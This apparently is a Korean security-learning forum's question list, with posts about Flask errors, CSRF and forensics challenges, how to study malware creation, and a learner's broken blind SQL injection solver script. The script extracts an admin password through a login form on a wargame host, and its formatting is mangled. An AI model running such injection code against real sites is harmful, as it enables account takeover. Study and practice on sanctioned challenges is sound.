Questions waiting for answers!
쿠키, 로그인

로그인을 할 때 이름이 왜 관리자 도구의 쿠키에 추가되지 않나요?

2023.05.18. 19:51

flask run 하면 서버 500에러가 납니다

flask run 하면 서버 에러가 납니다 Internal Server Error The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

2023.05.23. 11:31

악성코드 제작에 대해 공부하고 싶은데 어떻게 공부해야할까요?

악성코드 제작에 대해 공부하고 싶은데 어떻게 공부해야할까요? 처음에는 해커스쿨 FTZ, LOD 문제들을 풀다가 이건 제가 배우고 싶은 내용이 아니라는 생각이 들어 방향을 틀어서 드림핵과 hackthebox 문제들을 풀기 시작했는데 hackthebox 문제들 대부분이 제가 원하는 악성코드 제작보다는 nmap으로 초기정보수집 후 웹 서버를 해킹하는 식이여서 지금 방황중입니다. 악성코드 제작에 대해 공부해보고 싶은데 어떻게 공부해야할까요? 어떤 자료로 공부해야하는지도 감이 잡히지 않는데 좀 알려주세요

2023.05.28. 18:53

csrf-2 param 관련 질문이 있습니다.

csrf-2 문제에서 flag페이지를 통해 param이 check_csrf함수를 통해 vuln페이지에 전달되는 것으로 이해했는데요. 이렇게 전달된 param이 return param을 했는데도 vuln 페이지에서 동시에 띄워지지 않는 것은 왜인지 궁금합니다. check_csrf함수의 url에서 param을 통해 vuln페이지와 연결된 것일뿐, vuln함수의 param = request.args.get("param", "").lower()와는 관련이 없는 것인가요? 헷갈립니다....

2023.05.30. 16:05

안녕하세요

안녕하세요

2023.06.03. 15:46

서버 접속장애..ㅜㅜ

! 시스템해킹 우분투 접속이 안되는 데 어떻게 해결 해야 할가요...ㅜㅜㅜ

2023.06.04. 14:21

[드림핵 로드맵] Blind SQL Injection 자동화 스크립트

안녕하세요 웹 해킹 로드맵을 진행 중인데 Blind SQL Injection에서 패스워드 길이와 패스워드를 알아내는 자동화 스크립트 코드를 작성하는 실습 부분에서 막힙니다ㅠㅠ Visual Studio Code에서 실행시켜봐도 오류가 발생하고 실행이 되지 않습니다. 코드는 똑같이 따라했는데 코드가 문제인지 아니면 돌리는 환경의 문제인지 모르겠어요.. 혹시 한 번 해보신 분들 답변 부탁드립니다ㅠㅠ (그리고 prot 같은 경우에도 만약 16961이라면 {port}대신 16961을 넣고 실행 시켜봤는데도 안되네요..) #!/usr/bin/python3.9 import requests import sys from urllib.parse import urljoin class Solver: """Solver for simple_SQLi challenge""" initialization def init(self, port: str) -> None: self.challurl = f"http://host1.dreamhack.games:{port}" self.loginurl = urljoin(self.challurl, "login") base HTTP methods def _login(self, userid: str, userpassword: str) -> requests.Response: login_data = { "userid": userid, "userpassword": userpassword } resp = requests.post(self.loginurl, data=login_data) return resp base sqli methods def _sqli(self, query: str) -> requests.Response: resp = self._login(f"\" or {query}-- ", "hi") return resp def sqliltbinsearch(self, querytmpl: str, low: int, high: int) -> int: while 1: mid = (low+high) // 2 if low+1 >= high: break query = query_tmpl.format(val=mid) if "hello" in self._sqli(query).text: high = mid else: low = mid return mid attack methods def findpasswordlength(self, user: str, maxpw_len: int = 100) -> int: query_tmpl = f"((SELECT LENGTH(userpassword) WHERE userid=\"{user}\") < {{val}})" pwlen = self.sqliltbinsearch(querytmpl, 0, maxpw_len) return pw_len def findpassword(self, user: str, pw_len: int) -> str: pw = '' for idx in range(1, pw_len+1): query_tmpl = f"((SELECT SUBSTR(userpassword,{idx},1) WHERE userid=\"{user}\") < CHAR({{val}}))" pw += chr(self.sqliltbinsearch(querytmpl, 0x2f, 0x7e)) print(f"{idx}. {pw}") return pw def solve(self) -> None: Find the length of admin password pwlen = solver.findpasswordlength("admin") print(f"Length of the admin password is: {pw_len}") Find the admin password print("Finding password:") pw = solver.findpassword("admin", pw_len) print(f"Password of the admin is: {pw}") if name == "main": port = sys.argv[1] solver = Solver(port) solver.solve()

호옥시 지금 아폴로 포렌식 문제 푸신 분들 계시나요?

여기에 올려도 되는지 모르겠지만 도와주세용...

2023.06.04. 23:01